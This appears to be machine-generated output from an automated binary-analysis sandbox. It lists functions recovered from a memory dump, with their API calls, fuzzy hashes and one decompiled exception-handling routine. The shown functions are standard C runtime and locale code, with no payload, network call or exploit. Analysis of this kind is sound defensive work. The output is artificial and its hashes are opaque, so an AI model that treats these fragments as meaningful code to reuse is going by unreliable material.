                                                                                                            • Instruction Fuzzy Hash: 22F0F6362003056FDB245F79D884B6ABBD5FF85378F05842DE9454B680E7B1AC01E720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F07843F: RtlEnterCriticalSection.NTDLL(?), ref: 6F07844E
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09041C,00000001,6F0D8410,0000000C,6F090CBD,00000000), ref: 6F090461
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1272433827-0
                                                                                                            • Opcode ID: 90cd5ae5026fa3844f43983bf15292bea3823d5417db0724656a31ae648f2e41
                                                                                                            • Instruction ID: 7c4b1bc9339cd010544951c72086cf86668fb7f34c6a71387adfae1233f4d9e8
                                                                                                            • Opcode Fuzzy Hash: 90cd5ae5026fa3844f43983bf15292bea3823d5417db0724656a31ae648f2e41
                                                                                                            • Instruction Fuzzy Hash: 53F049B6A04714DFDB10DFA8D841B9DB7F0FB06329F10816AE4259B290DB7549109F40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09E29D,00000001,00000000,?,?,6F09EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6F09E37B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2417226690-0
                                                                                                            • Opcode ID: 5e0e7121580d258469cf6723b3cbb6f17b61ce857a2f6779297695e69eb68dfb
                                                                                                            • Instruction ID: 315935d8f87d656642efde1e98d3e9c0874fd1799dcaf85b6f7e09b68a5ed8e0
                                                                                                            • Opcode Fuzzy Hash: 5e0e7121580d258469cf6723b3cbb6f17b61ce857a2f6779297695e69eb68dfb
                                                                                                            • Instruction Fuzzy Hash: 0BF0E53A30020597DB049F75D948B6ABFA5FFC1725F0A805DEA198B241D671A842E7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6F0933BC,?,20001004,00000000,00000002,?,?,6F09271D), ref: 6F090E80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: b18d64e0765c7d52cdc77913d554e1e288f9f5d97d6f48ceae1d5657497b89d1
                                                                                                            • Instruction ID: f027d27dcd378d34514a84c3bf5ded822101c42bd17c11dcfa543502689be51c
                                                                                                            • Opcode Fuzzy Hash: b18d64e0765c7d52cdc77913d554e1e288f9f5d97d6f48ceae1d5657497b89d1
                                                                                                            • Instruction Fuzzy Hash: 7EE04F32504A1CFBCF122F71DC08F9E3E1AEF45765F009111FD1566190DB729921BAD4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6F06981B,?,00000022,00000000,00000002,?,?,6F066C7B,00000000,?), ref: 6F069EE2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: aee3ae516ce8c723d0d89ae319cc53792d18dbaee04811cabbc4f7eb4c85cdd3
                                                                                                            • Instruction ID: 5992c415745552788d97a94ea1cdc980ca9ca41949b25867aed2ff44f459ed04
                                                                                                            • Opcode Fuzzy Hash: aee3ae516ce8c723d0d89ae319cc53792d18dbaee04811cabbc4f7eb4c85cdd3
                                                                                                            • Instruction Fuzzy Hash: 6DE0C23280092CEBCF025FA5EC489EE3F2AEF06775B044005F90806114CB329831ABD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                            • Instruction ID: 9db0e9bcca2fb29e19de50a3aeb7167c9db21a730525391c5bb3785f24f02dad
                                                                                                            • Opcode Fuzzy Hash: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                            • Instruction Fuzzy Hash: 1F32BF74E0021AEFCF14CF58C980BAEBBB5EF45304F244169DC95AB794D732AA46CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                            • Instruction ID: afb265f2da1a665e8a783e8572e697297542612953cbbfebcdf8ebc2d70fdfef
                                                                                                            • Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                            • Instruction Fuzzy Hash: BC51A471E00259EFDF14CFA9C990BEEBBB2FF88304F588099E504AB245C734AA51CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E6F0321B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ebp;
                                                                                                            				signed int* _t43;
                                                                                                            				char _t44;
                                                                                                            				void* _t46;
                                                                                                            				void* _t49;
                                                                                                            				intOrPtr* _t53;
                                                                                                            				void* _t54;
                                                                                                            				void* _t65;
                                                                                                            				long _t66;
                                                                                                            				signed int* _t80;
                                                                                                            				signed int* _t82;
                                                                                                            				void* _t84;
                                                                                                            				signed int _t86;
                                                                                                            				void* _t89;
                                                                                                            				void* _t95;
                                                                                                            				void* _t96;
                                                                                                            				void* _t99;
                                                                                                            				void* _t106;
                                                                                                            
                                                                                                            				_t43 = _t84;
                                                                                                            				_t65 = __ebx + 2;
                                                                                                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                            				_t89 = _t95;
                                                                                                            				_t96 = _t95 - 8;
                                                                                                            				_push(_t65);
                                                                                                            				_push(_t84);
                                                                                                            				_push(_t89);
                                                                                                            				asm("cld");
                                                                                                            				_t66 = _a8;
                                                                                                            				_t44 = _a4;
                                                                                                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                            					_push(_t89);
                                                                                                            					E6F03231B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                            					_t46 = 1;
                                                                                                            				} else {
                                                                                                            					_v12 = _t44;
                                                                                                            					_v8 = _a12;
                                                                                                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                            					_t86 =  *(_t66 + 0xc);
                                                                                                            					_t80 =  *(_t66 + 8);
                                                                                                            					_t49 = E6F0323D5(_t66);
                                                                                                            					_t99 = _t96 + 4;
                                                                                                            					if(_t49 == 0) {
                                                                                                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                            						goto L11;
                                                                                                            					} else {
                                                                                                            						while(_t86 != 0xffffffff) {
                                                                                                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                            							if(_t53 == 0) {
                                                                                                            								L8:
                                                                                                            								_t80 =  *(_t66 + 8);
                                                                                                            								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                            								continue;
                                                                                                            							} else {
                                                                                                            								_t54 =  *_t53();
                                                                                                            								_t89 = _t89;
                                                                                                            								_t86 = _t86;
                                                                                                            								_t66 = _a8;
                                                                                                            								_t55 = _t54;
                                                                                                            								_t106 = _t54;
                                                                                                            								if(_t106 == 0) {
                                                                                                            									goto L8;
                                                                                                            								} else {
                                                                                                            									if(_t106 < 0) {
                                                                                                            										_t46 = 0;
                                                                                                            									} else {
                                                                                                            										_t82 =  *(_t66 + 8);
                                                                                                            										E6F0322C0(_t55, _t66);
                                                                                                            										_t89 = _t66 + 0x10;
                                                                                                            										E6F03231B(_t89, _t66, 0);
                                                                                                            										_t99 = _t99 + 0xc;
                                                                                                            										E6F0323B7(_t82[2]);
                                                                                                            										 *(_t66 + 0xc) =  *_t82;
                                                                                                            										_t66 = 0;
                                                                                                            										_t86 = 0;
                                                                                                            										 *(_t82[2])(1);
                                                                                                            										goto L8;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						L11:
                                                                                                            						_t46 = 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L13:
                                                                                                            				return _t46;
                                                                                                            			}























                                                                                                            0x6f032228
                                                                                                            0x6f032228
                                                                                                            0x6f03222c
                                                                                                            0x6f032234
                                                                                                            0x6f032239
                                                                                                            0x6f03223e
                                                                                                            0x6f03224a
                                                                                                            0x6f032252
                                                                                                            0x6f032259
                                                                                                            0x6f03225f
                                                                                                            0x6f032263
                                                                                                            0x00000000
                                                                                                            0x6f032263
                                                                                                            0x6f032226
                                                                                                            0x6f032224
                                                                                                            0x00000000
                                                                                                            0x6f03220a
                                                                                                            0x6f03227e
                                                                                                            0x6f03227e
                                                                                                            0x6f03227e
                                                                                                            0x6f0321fa
                                                                                                            0x6f03229a
                                                                                                            0x6f0322a1

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                            • Instruction ID: 67ad78b511b025594417c730388c85083c4dbdd8673d85614dc68292ab57db7e
                                                                                                            • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                            • Instruction Fuzzy Hash: 1121B633D04215AFDB10DF68CC80AABB7A5FF49350B0581A9D9159B245D730FA25CBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F066CB6
                                                                                                            • collate.LIBCPMT ref: 6F066CBF
                                                                                                              • Part of subcall function 6F0659D8: __EH_prolog3_GS.LIBCMT ref: 6F0659DF
                                                                                                              • Part of subcall function 6F0659D8: __Getcoll.LIBCPMT ref: 6F065A43
                                                                                                              • Part of subcall function 6F0659D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F065A5F
                                                                                                            • __Getcoll.LIBCPMT ref: 6F066D05
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D19
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D2E
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D7F
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066EB4
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066EC7
                                                                                                            • int.LIBCPMT ref: 6F066ED4
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066EE4
                                                                                                            • int.LIBCPMT ref: 6F066EF1
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066F01
                                                                                                            • int.LIBCPMT ref: 6F066F0E
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066F1E
                                                                                                            • int.LIBCPMT ref: 6F066CDF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • int.LIBCPMT ref: 6F066D42
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D6C
                                                                                                            • int.LIBCPMT ref: 6F066D97
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066DC5
                                                                                                            • int.LIBCPMT ref: 6F066DD2
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066DF9
                                                                                                            • int.LIBCPMT ref: 6F066E06
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066E56
                                                                                                            • int.LIBCPMT ref: 6F066E63
                                                                                                            • int.LIBCPMT ref: 6F066F36
                                                                                                            • numpunct.LIBCPMT ref: 6F066F5D
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066F6D
                                                                                                            • int.LIBCPMT ref: 6F066F7A
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066FB1
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066FC4
                                                                                                            • int.LIBCPMT ref: 6F066FD1
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066FE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 2009638416-0
                                                                                                            • Opcode ID: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction ID: b88f8a9b62268b91310e837935197862e9c1f3f2e6417438e6ac06688119bf8d
                                                                                                            • Opcode Fuzzy Hash: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction Fuzzy Hash: 3D91F670E05325AAEB246BB58E41B7F7AE9DF47754F10452DF808AF2C1EB748D1087A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 6F09B2E8
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA15
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA27
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA39
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA4B
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA5D
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA6F
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA81
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA93
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAA5
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAB7
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAC9
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CADB
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAED
                                                                                                            • _free.LIBCMT ref: 6F09B2DD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09B2FF
                                                                                                            • _free.LIBCMT ref: 6F09B314
                                                                                                            • _free.LIBCMT ref: 6F09B31F
                                                                                                            • _free.LIBCMT ref: 6F09B341
                                                                                                            • _free.LIBCMT ref: 6F09B354
                                                                                                            • _free.LIBCMT ref: 6F09B362
                                                                                                            • _free.LIBCMT ref: 6F09B36D
                                                                                                            • _free.LIBCMT ref: 6F09B3A5
                                                                                                            • _free.LIBCMT ref: 6F09B3AC
                                                                                                            • _free.LIBCMT ref: 6F09B3C9
                                                                                                            • _free.LIBCMT ref: 6F09B3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction ID: 3f9fa70ca20f02cb9c3e7a39182d44f9e0c1c8e6995c2c591b584dee4214acfc
                                                                                                            • Opcode Fuzzy Hash: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction Fuzzy Hash: 693139B16047019FEB118B39DA40BDA73E9AF04324F54A42AE465DB191EF30FA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • _free.LIBCMT ref: 6F0932BF
                                                                                                            • _free.LIBCMT ref: 6F0932D8
                                                                                                            • _free.LIBCMT ref: 6F093316
                                                                                                            • _free.LIBCMT ref: 6F09331F
                                                                                                            • _free.LIBCMT ref: 6F09332B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast
                                                                                                            • String ID: C
                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                            • Opcode ID: 19d99d6331f91fd426a2ae1c6812dbba832424c3ae55c1c0639e9d6a8ecbed85
                                                                                                            • Instruction ID: 140a03c877b8ae2763e99a5afeb4eb023bef63c25f0ca63de64be793181158f9
                                                                                                            • Opcode Fuzzy Hash: 19d99d6331f91fd426a2ae1c6812dbba832424c3ae55c1c0639e9d6a8ecbed85
                                                                                                            • Instruction Fuzzy Hash: DDC14A75A012199BDB24CF28C995B9DB7F8FF49304F5085AAE84DA7390E731AE90DF40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065688
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065692
                                                                                                            • int.LIBCPMT ref: 6F0656A9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0656E3
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065703
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065710
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06571D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            • Opcode ID: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction ID: 14f898f53643ffd12c7355212039c740929d5f6069663ffd3f7648b3cce13b42
                                                                                                            • Opcode Fuzzy Hash: a15cc81070a22cf4bd7867f48526b46e6bc097b65eeb3781431eb724a0c1ae73
                                                                                                            • Instruction Fuzzy Hash: 2221D275904729DBCF12DFA4CA447BEBBB2BF45728F644509E8146B3C1CBB09A11CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057DA6
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057DB0
                                                                                                            • int.LIBCPMT ref: 6F057DC7
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057E01
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057E21
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057E2E
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F09D196: _free.LIBCMT ref: 6F09D1BB
                                                                                                            • _free.LIBCMT ref: 6F09D4F9
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09D504
                                                                                                            • _free.LIBCMT ref: 6F09D50F
                                                                                                            • _free.LIBCMT ref: 6F09D563
                                                                                                            • _free.LIBCMT ref: 6F09D56E
                                                                                                            • _free.LIBCMT ref: 6F09D579
                                                                                                            • _free.LIBCMT ref: 6F09D584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051C9D
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051CA7
                                                                                                            • int.LIBCPMT ref: 6F051CBE
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F051CE1
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051CF8
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051D18
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051D25
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056F19
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056F23
                                                                                                            • int.LIBCPMT ref: 6F056F3A
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056F5D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F056F74
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F056F94
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F056FA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05773F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057749
                                                                                                            • int.LIBCPMT ref: 6F057760
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057783
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05779A
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0577BA
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0577C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056FAE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056FB8
                                                                                                            • int.LIBCPMT ref: 6F056FCF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056FF2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057009
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057029
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057036
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0577D4
